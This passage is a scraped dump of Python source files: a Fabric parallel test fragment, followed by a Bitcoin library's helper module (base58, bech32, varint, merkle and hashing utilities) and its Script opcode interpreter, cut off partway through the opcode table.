from fabric.api import run, parallel, env, hide
from utils import FabricTest, eq_
from server import server, RESPONSES
class TestParallel(FabricTest):
@server()
@parallel
def test_parallel(self):
"""
Want to do a simple call and respond
"""
env.pool_size = 10
cmd = "ls /simple"
with hide('everything'):
eq_(run(cmd), RESPONSES[cmd])
``` |
{
"source": "jimmysong/-minipy",
"score": 2
} |
#### File: jimmysong/-minipy/helper.py
```python
import hashlib
import hmac
from base64 import b64decode, b64encode
from glob import glob
from io import BufferedIOBase
from os import unlink
from os.path import exists
from pbkdf2 import PBKDF2
from typing import Any, Dict, List, Optional, Tuple
BASE58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
BECH32_ALPHABET = 'qpzry9x8gf2tvdw0s3jn54khce6mua7l'
GEN = [0x3b6a57b2, 0x26508e6d, 0x1ea119fa, 0x3d4233dd, 0x2a1462b3]
PBKDF2_ROUNDS = 2048
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
def base64_encode(b: bytes) -> str:
return b64encode(b).decode('ascii')
def base64_decode(s: str) -> bytes:
return b64decode(s)
# next four functions are straight from BIP0173:
# https://github.com/bitcoin/bips/blob/master/bip-0173.mediawiki
def bech32_polymod(values: List[int]) -> int:
chk = 1
for v in values:
b = (chk >> 25)
chk = (chk & 0x1ffffff) << 5 ^ v
for i in range(5):
chk ^= GEN[i] if ((b >> i) & 1) else 0
return chk
def bech32_hrp_expand(s: str) -> List[int]:
b = s.encode('ascii')
return [x >> 5 for x in b] + [0] + [x & 31 for x in b]
def bech32_verify_checksum(hrp: str, data: List[int]) -> bool:
return bech32_polymod(bech32_hrp_expand(hrp) + data) == 1
def bech32_create_checksum(hrp: str, data: List[int]) -> List[int]:
values = bech32_hrp_expand(hrp) + data
polymod = bech32_polymod(values + [0, 0, 0, 0, 0, 0]) ^ 1
return [(polymod >> 5 * (5 - i)) & 31 for i in range(6)]
def big_endian_to_int(b: bytes) -> int:
'''little_endian_to_int takes byte sequence as a little-endian number.
Returns an integer'''
# use the int.from_bytes(b, <endianness>) method
return int.from_bytes(b, 'big')
def bit_field_to_bytes(bit_field: List[int]) -> bytes:
if len(bit_field) % 8 != 0:
raise RuntimeError(
'bit_field does not have a length that is divisible by 8')
result = bytearray(len(bit_field) // 8)
for i, bit in enumerate(bit_field):
byte_index, bit_index = divmod(i, 8)
if bit:
result[byte_index] |= 1 << bit_index
return bytes(result)
def byte_to_int(b: bytes) -> int:
'''Returns an integer that corresponds to the byte'''
return b[0]
def bytes_to_bit_field(some_bytes: bytes) -> List[int]:
flag_bits = []
# iterate over each byte of flags
for byte in some_bytes:
# iterate over each bit, right-to-left
for _ in range(8):
# add the current bit (byte & 1)
flag_bits.append(byte & 1)
# rightshift the byte 1
byte >>= 1
return flag_bits
def check_not_exists(*filenames) -> None:
for filename in filenames:
if exists(filename):
raise IOError(f'file {filename} already exists')
def choice_menu(items: List[Any], exit_option: bool = False) -> Any:
if exit_option:
print('0. Exit')
if len(items) == 1:
return items[0]
for i, item in enumerate(items):
print(f'{i+1}. {item}')
while True:
choice = int(input('Please make your choice: '))
if exit_option and choice == 0:
return None
if 0 <= choice - 1 < len(items):
return items[choice - 1]
def choose_file(extension: str) -> Optional[str]:
choices = glob(f'*.{extension}')
if len(choices) == 0:
print(f'No {extension} file in this directory')
return None
else:
return choice_menu(choices)
def decode_base58(s: str) -> bytes:
return raw_decode_base58(s)[1:]
def decode_bech32(s: str) -> Tuple[bool, int, bytes]:
'''Returns whether it's testnet, segwit version and the hash from the bech32 address'''
hrp, raw_data = s.split('1')
if hrp == 'tb':
testnet = True
elif hrp == 'bc':
testnet = False
else:
raise ValueError(f'unknown human readable part: {hrp}')
data = [BECH32_ALPHABET.index(c) for c in raw_data]
if not bech32_verify_checksum(hrp, data):
raise ValueError(f'bad address: {s}')
version = data[0]
number = 0
for digit in data[1:-6]:
number = (number << 5) | digit
num_bytes = (len(data) - 7) * 5 // 8
bits_to_ignore = (len(data) - 7) * 5 % 8
number >>= bits_to_ignore
h = int_to_big_endian(number, num_bytes)
if num_bytes < 2 or num_bytes > 40:
raise ValueError(f'bytes out of range: {num_bytes}')
return testnet, version, h
def delete_files(*filenames) -> None:
for filename in filenames:
if exists(filename):
unlink(filename)
def encode_base58(s: bytes) -> str:
# determine how many 0 bytes (b'\x00') s starts with
count = 0
for c in s:
if c == 0:
count += 1
else:
break
# convert from binary to hex, then hex to integer
num = int(s.hex(), 16)
result = ''
prefix = '1' * count
while num > 0:
num, mod = divmod(num, 58)
result = BASE58_ALPHABET[mod] + result
return prefix + result
def encode_base58_checksum(raw: bytes) -> str:
'''Takes bytes and turns it into base58 encoding with checksum'''
# checksum is the first 4 bytes of the hash256
checksum = hash256(raw)[:4]
# encode_base58 on the raw and the checksum
return encode_base58(raw + checksum)
def encode_bech32(nums: List[int]) -> str:
'''Convert from 5-bit array of integers to bech32 format'''
result = ''
for n in nums:
result += BECH32_ALPHABET[n]
return result
def encode_bech32_checksum(s: bytes, testnet: bool = False) -> str:
'''Convert a segwit ScriptPubKey to a bech32 address'''
if testnet:
prefix = 'tb'
else:
prefix = 'bc'
version = s[0]
if version > 0:
version -= 0x50
length = s[1]
data = [version] + group_32(s[2:2 + length])
checksum = bech32_create_checksum(prefix, data)
bech32 = encode_bech32(data + checksum)
return prefix + '1' + bech32
def encode_dict(d: Dict[bytes, Any]) -> bytes:
return encode_list(d.values())
def encode_list(l: Any) -> bytes:
result = encode_varint(len(l))
for item in l:
result += item.serialize()
return result
def encode_varint(i: int) -> bytes:
'''encodes an integer as a varint'''
if i < 0xfd:
return bytes([i])
elif i < 0x10000:
return b'\xfd' + int_to_little_endian(i, 2)
elif i < 0x100000000:
return b'\xfe' + int_to_little_endian(i, 4)
elif i < 0x10000000000000000:
return b'\xff' + int_to_little_endian(i, 8)
else:
raise RuntimeError(f'integer too large: {i}')
def encode_varstr(b: bytes) -> bytes:
'''encodes bytes as a varstr'''
# encode the length of the string using encode_varint
result = encode_varint(len(b))
# add the bytes
result += b
# return the whole thing
return result
def group_32(s: bytes) -> List[int]:
'''Convert from 8-bit bytes to 5-bit array of integers'''
result = []
unused_bits = 0
current = 0
for c in s:
unused_bits += 8
current = (current << 8) + c
while unused_bits > 5:
unused_bits -= 5
result.append(current >> unused_bits)
mask = (1 << unused_bits) - 1
current &= mask
result.append(current << (5 - unused_bits))
return result
def hash160(s: bytes) -> bytes:
return hashlib.new('ripemd160', hashlib.sha256(s).digest()).digest()
def hash256(s: bytes) -> bytes:
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def hmac_sha512(key: bytes, msg: bytes) -> bytes:
return hmac.HMAC(key=key, msg=msg, digestmod=hashlib.sha512).digest()
def hmac_sha512_kdf(msg: str, salt: bytes) -> bytes:
return PBKDF2(
msg,
salt,
iterations=PBKDF2_ROUNDS,
macmodule=hmac,
digestmodule=hashlib.sha512,
).read(64)
def int_to_big_endian(n: int, length: int) -> bytes:
'''int_to_little_endian takes an integer and returns the little-endian
byte sequence of length'''
# use the int.to_bytes(length, <endianness>) method
return n.to_bytes(length, 'big')
def int_to_byte(n: int) -> bytes:
'''Returns a single byte that corresponds to the integer'''
if n > 255 or n < 0:
raise ValueError(
'integer greater than 255 or lower than 0 cannot be converted into a byte'
)
return bytes([n])
def int_to_little_endian(n: int, length: int) -> bytes:
'''int_to_little_endian takes an integer and returns the little-endian
byte sequence of length'''
# use the int.to_bytes(length, <endianness>) method
return n.to_bytes(length, 'little')
def little_endian_to_int(b: bytes) -> int:
'''little_endian_to_int takes byte sequence as a little-endian number.
Returns an integer'''
# use the int.from_bytes(b, <endianness>) method
return int.from_bytes(b, 'little')
def merkle_parent(hash1: bytes, hash2: bytes) -> bytes:
'''Takes the binary hashes and calculates the hash256'''
# return the hash256 of hash1 + hash2
return hash256(hash1 + hash2)
def merkle_parent_level(hashes: List[bytes]) -> List[bytes]:
'''Takes a list of binary hashes and returns a list that's half
the length'''
# if the list has exactly 1 element raise an error
if len(hashes) == 1:
raise RuntimeError('Cannot take a parent level with only 1 item')
# if the list has an odd number of elements, duplicate the last one
# and put it at the end so it has an even number of elements
if len(hashes) % 2 == 1:
hashes.append(hashes[-1])
# initialize parent level
parent_level = []
# loop over every pair (use: for i in range(0, len(hashes), 2))
for i in range(0, len(hashes), 2):
# get the merkle parent of i and i+1 hashes
parent = merkle_parent(hashes[i], hashes[i + 1])
# append parent to parent level
parent_level.append(parent)
# return parent level
return parent_level
def merkle_root(hashes: List[bytes]) -> bytes:
'''Takes a list of binary hashes and returns the merkle root
'''
# current level starts as hashes
current_level = hashes
# loop until there's exactly 1 element
while len(current_level) > 1:
# current level becomes the merkle parent level
current_level = merkle_parent_level(current_level)
# return the 1st item of current_level
return current_level[0]
def murmur3(data: bytes, seed: int = 0) -> int:
'''from http://stackoverflow.com/questions/13305290/is-there-a-pure-python-implementation-of-murmurhash'''
c1 = 0xcc9e2d51
c2 = 0x1b873593
length = len(data)
h1 = seed
roundedEnd = (length & 0xfffffffc) # round down to 4 byte block
for i in range(0, roundedEnd, 4):
# little endian load order
k1 = (data[i] & 0xff) | ((data[i + 1] & 0xff) << 8) | \
((data[i + 2] & 0xff) << 16) | (data[i + 3] << 24)
k1 *= c1
k1 = (k1 << 15) | ((k1 & 0xffffffff) >> 17) # ROTL32(k1,15)
k1 *= c2
h1 ^= k1
h1 = (h1 << 13) | ((h1 & 0xffffffff) >> 19) # ROTL32(h1,13)
h1 = h1 * 5 + 0xe6546b64
# tail
k1 = 0
val = length & 0x03
if val == 3:
k1 = (data[roundedEnd + 2] & 0xff) << 16
# fallthrough
if val in [2, 3]:
k1 |= (data[roundedEnd + 1] & 0xff) << 8
# fallthrough
if val in [1, 2, 3]:
k1 |= data[roundedEnd] & 0xff
k1 *= c1
k1 = (k1 << 15) | ((k1 & 0xffffffff) >> 17) # ROTL32(k1,15)
k1 *= c2
h1 ^= k1
# finalization
h1 ^= length
# fmix(h1)
h1 ^= ((h1 & 0xffffffff) >> 16)
h1 *= 0x85ebca6b
h1 ^= ((h1 & 0xffffffff) >> 13)
h1 *= 0xc2b2ae35
h1 ^= ((h1 & 0xffffffff) >> 16)
return h1 & 0xffffffff
def raw_decode_base58(s: str) -> bytes:
num = 0
# see how many leading 0's we are starting with
prefix = b''
for c in s:
if num == 0 and c == '1':
prefix += b'\x00'
else:
num = 58 * num + BASE58_ALPHABET.index(c)
# put everything into base64
byte_array = []
while num > 0:
byte_array.insert(0, num & 255)
num >>= 8
combined = prefix + bytes(byte_array)
checksum = combined[-4:]
if hash256(combined[:-4])[:4] != checksum:
raise RuntimeError(f'bad address: {checksum} {hash256(combined)[:4]}')
return combined[:-4]
def read_dict(s: BufferedIOBase, cls: Any) -> Dict[bytes, Any]:
return {item.key(): item for item in read_list(s, cls)}
def read_list(s: BufferedIOBase, cls: Any) -> Any:
num_items = read_varint(s)
return [cls.parse(s) for _ in range(num_items)]
def read_varint(s: BufferedIOBase) -> int:
'''reads a variable integer from a stream'''
b = s.read(1)
if len(b) != 1:
raise IOError('stream has no bytes')
i = b[0]
if i == 0xfd:
# 0xfd means the next two bytes are the number
return little_endian_to_int(s.read(2))
elif i == 0xfe:
# 0xfe means the next four bytes are the number
return little_endian_to_int(s.read(4))
elif i == 0xff:
# 0xff means the next eight bytes are the number
return little_endian_to_int(s.read(8))
else:
# anything else is just the integer
return i
def read_varstr(s: BufferedIOBase) -> bytes:
'''reads a variable string from a stream'''
# remember that s.read(n) will read n bytes from the stream
# find the length of the string by using read_varint on the string
item_length = read_varint(s)
# read that many bytes from the stream
return s.read(item_length)
def serialize_key_value(key: bytes, value: bytes) -> bytes:
return encode_varstr(key) + encode_varstr(value)
def sha256(s: bytes) -> bytes:
return hashlib.sha256(s).digest()
```
#### File: jimmysong/-minipy/op.py
```python
import hashlib
from typing import List
from ecc import (
S256Point,
Signature,
)
from helper import (
hash160,
hash256,
)
from timelock import Locktime, Sequence
def is_number_op_code(op_code: bytes) -> bool:
return op_code in OP_CODE_TO_NUMBER
def number_to_op_code(n: int) -> bytes:
'''Returns the op code number for a particular number'''
if NUMBER_TO_OP_CODE.get(n) is None:
raise ValueError(f'No OP code exists for {n}')
return NUMBER_TO_OP_CODE[n]
def op_code_to_number(op_code: bytes) -> int:
'''Returns the n for a particular OP code'''
if OP_CODE_TO_NUMBER.get(op_code) is None:
raise ValueError(f'Not a number OP code: {op_code.hex()}')
return OP_CODE_TO_NUMBER[op_code]
def encode_minimal_num(n: int) -> bytes:
if -1 <= n <= 16:
return number_to_op_code(n)
else:
return encode_num(n)
def decode_minimal_num(n: bytes) -> int:
if is_number_op_code(n):
return op_code_to_number(n)
else:
return decode_num(n)
def encode_num(num: int) -> bytes:
if num == 0:
return OP_0
abs_num = abs(num)
negative = num < 0
result = bytearray()
while abs_num:
result.append(abs_num & 0xff)
abs_num >>= 8
# if the top bit is set,
# for negative numbers we ensure that the top bit is set
# for positive numbers we ensure that the top bit is not set
if result[-1] & 0x80:
if negative:
result.append(0x80)
else:
result.append(0)
elif negative:
result[-1] |= 0x80
return bytes(result)
def decode_num(element: bytes) -> int:
if element == OP_0:
return 0
# reverse for big endian
big_endian = element[::-1]
# top bit being 1 means it's negative
if big_endian[0] & 0x80:
negative = True
result = big_endian[0] & 0x7f
else:
negative = False
result = big_endian[0]
for c in big_endian[1:]:
result <<= 8
result += c
if negative:
return -result
else:
return result
def op_0(stack: List[bytes]) -> bool:
stack.append(encode_num(0))
return True
def op_1negate(stack: List[bytes]) -> bool:
stack.append(encode_num(-1))
return True
def op_1(stack: List[bytes]) -> bool:
stack.append(encode_num(1))
return True
def op_2(stack: List[bytes]) -> bool:
stack.append(encode_num(2))
return True
def op_3(stack: List[bytes]) -> bool:
stack.append(encode_num(3))
return True
def op_4(stack: List[bytes]) -> bool:
stack.append(encode_num(4))
return True
def op_5(stack: List[bytes]) -> bool:
stack.append(encode_num(5))
return True
def op_6(stack: List[bytes]) -> bool:
stack.append(encode_num(6))
return True
def op_7(stack: List[bytes]) -> bool:
stack.append(encode_num(7))
return True
def op_8(stack: List[bytes]) -> bool:
stack.append(encode_num(8))
return True
def op_9(stack: List[bytes]) -> bool:
stack.append(encode_num(9))
return True
def op_10(stack: List[bytes]) -> bool:
stack.append(encode_num(10))
return True
def op_11(stack: List[bytes]) -> bool:
stack.append(encode_num(11))
return True
def op_12(stack: List[bytes]) -> bool:
stack.append(encode_num(12))
return True
def op_13(stack: List[bytes]) -> bool:
stack.append(encode_num(13))
return True
def op_14(stack: List[bytes]) -> bool:
stack.append(encode_num(14))
return True
def op_15(stack: List[bytes]) -> bool:
stack.append(encode_num(15))
return True
def op_16(stack: List[bytes]) -> bool:
stack.append(encode_num(16))
return True
def op_nop(stack: List[bytes]) -> bool:
return True
def op_if(stack: List[bytes], items: List[bytes]) -> bool:
if len(stack) < 1:
return False
# go through and re-make the items array based on the top stack element
true_items = []
false_items = []
current_array = true_items
found = False
num_endifs_needed = 1
while len(items) > 0:
item = items.pop(0)
if item in (OP_IF, OP_NOTIF):
# nested if, we have to go another endif
num_endifs_needed += 1
current_array.append(item)
elif num_endifs_needed == 1 and item == OP_ELSE:
current_array = false_items
elif item == OP_ENDIF:
if num_endifs_needed == 1:
found = True
break
else:
num_endifs_needed -= 1
current_array.append(item)
else:
current_array.append(item)
if not found:
return False
element = stack.pop()
if decode_num(element) == 0:
items[:0] = false_items
else:
items[:0] = true_items
return True
def op_notif(stack: List[bytes], items: List[bytes]) -> bool:
if len(stack) < 1:
return False
# go through and re-make the items array based on the top stack element
true_items = []
false_items = []
current_array = true_items
found = False
num_endifs_needed = 1
while len(items) > 0:
item = items.pop(0)
if item in (99, 100):
# nested if, we have to go another endif
num_endifs_needed += 1
current_array.append(item)
elif num_endifs_needed == 1 and item == 103:
current_array = false_items
elif item == 104:
if num_endifs_needed == 1:
found = True
break
else:
num_endifs_needed -= 1
current_array.append(item)
else:
current_array.append(item)
if not found:
return False
element = stack.pop()
if decode_num(element) == 0:
items[:0] = true_items
else:
items[:0] = false_items
return True
def op_verify(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
if decode_num(element) == 0:
return False
return True
def op_return(stack: List[bytes]) -> bool:
return False
def op_toaltstack(stack: List[bytes], altstack: List[bytes]) -> bool:
if len(stack) < 1:
return False
altstack.append(stack.pop())
return True
def op_fromaltstack(stack: List[bytes], altstack: List[bytes]) -> bool:
if len(altstack) < 1:
return False
stack.append(altstack.pop())
return True
def op_2drop(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.pop()
stack.pop()
return True
def op_2dup(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.extend(stack[-2:])
return True
def op_3dup(stack: List[bytes]) -> bool:
if len(stack) < 3:
return False
stack.extend(stack[-3:])
return True
def op_2over(stack: List[bytes]) -> bool:
if len(stack) < 4:
return False
stack.extend(stack[-4:-2])
return True
def op_2rot(stack: List[bytes]) -> bool:
if len(stack) < 6:
return False
stack.extend(stack[-6:-4])
return True
def op_2swap(stack: List[bytes]) -> bool:
if len(stack) < 4:
return False
stack[-4:] = stack[-2:] + stack[-4:-2]
return True
def op_ifdup(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
if decode_num(stack[-1]) != 0:
stack.append(stack[-1])
return True
def op_depth(stack: List[bytes]) -> bool:
stack.append(encode_num(len(stack)))
return True
def op_drop(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
stack.pop()
return True
def op_dup(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
stack.append(stack[-1])
return True
def op_nip(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack[-2:] = stack[-1:]
return True
def op_over(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.append(stack[-2])
return True
def op_pick(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
n = decode_num(stack.pop())
if len(stack) < n + 1:
return False
stack.append(stack[-n - 1])
return True
def op_roll(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
n = decode_num(stack.pop())
if len(stack) < n + 1:
return False
if n == 0:
return True
stack.append(stack.pop(-n - 1))
return True
def op_rot(stack: List[bytes]) -> bool:
if len(stack) < 3:
return False
stack.append(stack.pop(-3))
return True
def op_swap(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.append(stack.pop(-2))
return True
def op_tuck(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
stack.insert(-2, stack[-1])
return True
def op_size(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
stack.append(encode_num(len(stack[-1])))
return True
def op_equal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = stack.pop()
element2 = stack.pop()
if element1 == element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_equalverify(stack: List[bytes]) -> bool:
return op_equal(stack) and op_verify(stack)
def op_1add(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
stack.append(encode_num(element + 1))
return True
def op_1sub(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
stack.append(encode_num(element - 1))
return True
def op_negate(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
stack.append(encode_num(-element))
return True
def op_abs(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = decode_num(stack.pop())
if element < 0:
stack.append(encode_num(-element))
else:
stack.append(encode_num(element))
return True
def op_not(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
if decode_num(element) == 0:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_0notequal(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
if decode_num(element) == 0:
stack.append(encode_num(0))
else:
stack.append(encode_num(1))
return True
def op_add(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
stack.append(encode_num(element1 + element2))
return True
def op_sub(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
stack.append(encode_num(element2 - element1))
return True
def op_booland(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 and element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_boolor(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 or element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_numequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 == element2:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_numequalverify(stack: List[bytes]) -> bool:
return op_numequal(stack) and op_verify(stack)
def op_numnotequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 == element2:
stack.append(encode_num(0))
else:
stack.append(encode_num(1))
return True
def op_lessthan(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 < element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_greaterthan(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 > element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_lessthanorequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 <= element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_greaterthanorequal(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element2 >= element1:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_min(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 < element2:
stack.append(encode_num(element1))
else:
stack.append(encode_num(element2))
return True
def op_max(stack: List[bytes]) -> bool:
if len(stack) < 2:
return False
element1 = decode_num(stack.pop())
element2 = decode_num(stack.pop())
if element1 > element2:
stack.append(encode_num(element1))
else:
stack.append(encode_num(element2))
return True
def op_within(stack: List[bytes]) -> bool:
if len(stack) < 3:
return False
maximum = decode_num(stack.pop())
minimum = decode_num(stack.pop())
element = decode_num(stack.pop())
if element >= minimum and element < maximum:
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_ripemd160(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hashlib.new('ripemd160', element).digest())
return True
def op_sha1(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hashlib.sha1(element).digest())
return True
def op_sha256(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hashlib.sha256(element).digest())
return True
def op_hash160(stack: List[bytes]) -> bool:
# check to see if there's at least 1 element
if len(stack) < 1:
return False
# get the element on the top with stack.pop()
element = stack.pop()
# add the hash160 of the element to the end of the stack
h160 = hash160(element)
stack.append(h160)
return True
def op_hash256(stack: List[bytes]) -> bool:
if len(stack) < 1:
return False
element = stack.pop()
stack.append(hash256(element))
return True
def op_checksig(stack: List[bytes], z: int) -> bool:
# check to see if there's at least 2 elements
if len(stack) < 2:
return False
# get the sec_pubkey with stack.pop()
sec_pubkey = stack.pop()
# get the der_signature with stack.pop()[:-1] (last byte is removed)
der_signature = stack.pop()[:-1]
# parse the sec format pubkey with S256Point
point = S256Point.parse(sec_pubkey)
# parse the der format signature with Signature
sig = Signature(der_signature)
# verify using the point, z and signature
# if verified add encode_num(1) to the end, otherwise encode_num(0)
if point.verify(z, sig):
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_checksigverify(stack: List[bytes], z: int) -> bool:
return op_checksig(stack, z) and op_verify(stack)
def op_checkmultisig(stack: List[bytes], z: int) -> bool:
if len(stack) < 1:
return False
n = decode_num(stack.pop())
if len(stack) < n + 1:
return False
sec_pubkeys = []
for _ in range(n):
sec_pubkeys.append(stack.pop())
m = decode_num(stack.pop())
if len(stack) < m + 1:
return False
der_signatures = []
for _ in range(m):
# signature is assumed to be using SIGHASH_ALL
der_signatures.append(stack.pop()[:-1])
# OP_CHECKMULTISIG bug
stack.pop()
try:
# parse the sec pubkeys into an array of points
points = [S256Point.parse(sec) for sec in sec_pubkeys]
# parse the der_signatures into an array of signatures
sigs = [Signature(der) for der in der_signatures]
# loop through the signatures
for sig in sigs:
# bail early if we don't have any points left
if len(points) == 0:
print("signatures no good or not in right order")
return False
# while we have points
while points:
# get the point at the front (points.pop(0))
point = points.pop(0)
# see if this point can verify this sig with this z
if point.verify(z, sig):
# break if so, this sig is valid!
break
# if we made it this far, we have to add a 1 to the stack
# use encode_num(1)
stack.append(encode_num(1))
except (ValueError, SyntaxError):
return False
return True
def op_checkmultisigverify(stack: List[bytes], z: int) -> bool:
return op_checkmultisig(stack, z) and op_verify(stack)
def op_checklocktimeverify(stack: List[bytes], locktime: Locktime, sequence: Sequence) -> bool:
if sequence.is_max():
return False
if len(stack) < 1:
return False
element = decode_num(stack[-1])
if element < 0:
return False
stack_locktime = Locktime(element)
if not locktime.comparable(stack_locktime):
return False
if locktime.less_than(stack_locktime):
return False
return True
def op_checksequenceverify(stack: List[bytes], version: int, sequence: Sequence) -> bool:
if not sequence.relative():
return False
if len(stack) < 1:
return False
element = decode_num(stack[-1])
if element < 0:
return False
if version < 2:
return False
stack_sequence = Sequence(element)
if not sequence.comparable(stack_sequence):
return False
if sequence.less_than(stack_sequence):
return False
return True
OP_0 = b''
OP_PUSHDATA1 = bytes([76])
OP_PUSHDATA2 = bytes([77])
OP_PUSHDATA4 = bytes([78])
OP_1NEGATE = bytes([79])
OP_1 = bytes([81])
OP_2 = bytes([82])
OP_3 = bytes([83])
OP_4 = bytes([84])
OP_5 = bytes([85])
OP_6 = bytes([86])
OP_7 = bytes([87])
OP_8 = bytes([88])
OP_9 = bytes([89])
OP_10 = bytes([90])
OP_11 = bytes([91])
OP_12 = bytes([92])
OP_13 = bytes([93])
OP_14 = bytes([94])
OP_15 = bytes([95])
OP_16 = bytes([96])
OP_NOP = bytes([97])
OP_IF = bytes([99])
OP_NOTIF = bytes([100])
OP_ELSE = bytes([103])
OP_ENDIF = bytes([104])
OP_VERIFY = bytes([105])
OP_RETURN = bytes([106])
OP_TOALTSTACK = bytes([107])
OP_FROMALTSTACK = bytes([108])
OP_2DROP = bytes([109])
OP_2DUP = bytes([110])
OP_3DUP = bytes([111])
OP_2OVER = bytes([112])
OP_2ROT = bytes([113])
OP_2SWAP = bytes([114])
OP_IFDUP = bytes([115])
OP_DEPTH = bytes([116])
OP_DROP = bytes([117])
OP_DUP = bytes([118])
OP_NIP = bytes([119])
OP_OVER = bytes([120])
OP_PICK = bytes([121])
OP_ROLL = bytes([122])
OP_ROT = bytes([123])
OP_SWAP = bytes([124])
OP_TUCK = bytes([125])
OP_SIZE = bytes([130])
OP_EQUAL = bytes([135])
OP_EQUALVERIFY = bytes([136])
OP_1ADD = bytes([139])
OP_1SUB = bytes([140])
OP_NEGATE = bytes([143])
OP_ABS = bytes([144])
OP_NOT = bytes([145])
OP_0NOTEQUAL = bytes([146])
OP_ADD = bytes([147])
OP_SUB = bytes([148])
OP_BOOLAND = bytes([154])
OP_BOOLOR = bytes([155])
OP_NUMEQUAL = bytes([156])
OP_NUMEQUALVERIFY = bytes([157])
OP_NUMNOTEQUAL = bytes([158])
OP_LESSTHAN = bytes([159])
OP_GREATERTHAN = bytes([160])
OP_LESSTHANOREQUAL = bytes([161])
OP_GREATERTHANOREQUAL = bytes([162])
OP_MIN = bytes([163])
OP_MAX = bytes([164])
OP_WITHIN = bytes([165])
OP_RIPEMD160 = bytes([166])
OP_SHA1 = bytes([167])
OP_SHA256 = bytes([168])
OP_HASH160 = bytes([169])
OP_HASH256 = bytes([170])
OP_CHECKSIG = bytes([172])
OP_CHECKSIGVERIFY = bytes([173])
OP_CHECKMULTISIG = bytes([174])
OP_CHECKMULTISIGVERIFY = bytes([175])
OP_CHECKLOCKTIMEVERIFY = bytes([177])
OP_CHECKSEQUENCEVERIFY = bytes([178])
OP_CODE_TO_NUMBER = {
OP_0: 0,
OP_1NEGATE: -1,
OP_1: 1,
OP_2: 2,
OP_3: 3,
OP_4: 4,
OP_5: 5,
OP_6: 6,
OP_7: 7,
OP_8: 8,
OP_9: 9,
OP_10: 10,
OP_11: 11,
OP_12: 12,
OP_13: 13,
OP_14: 14,
OP_15: 15,
OP_16: 16,
}
NUMBER_TO_OP_CODE = {v: k for k, v in OP_CODE_TO_NUMBER.items()}
OP_CODE_FUNCTIONS = {
OP_0: op_0,
OP_1: op_1,
OP_2: op_2,
OP_3: op_3,
OP_4: op_4,
OP_5: op_5,
OP_6: op_6,
OP_7: op_7,
OP_8: op_8,
OP_9: op_9,
OP_10: op_10,
OP_11: op_11,
OP_12: op_12,
OP_13: op_13,
OP_14: op_14,
OP_15: op_15,
OP_16: op_16,
OP_CHECKLOCKTIMEVERIFY: op_checklocktimeverify,
OP_CHECKMULTISIG: op_checkmultisig,
OP_CHECKMULTISIGVERIFY: op_checkmultisigverify,
OP_CHECKSEQUENCEVERIFY: op_checksequenceverify,
OP_CHECKSIG: op_checksig,
OP_CHECKSIGVERIFY: op_checksigverify,
OP_DROP: op_drop,
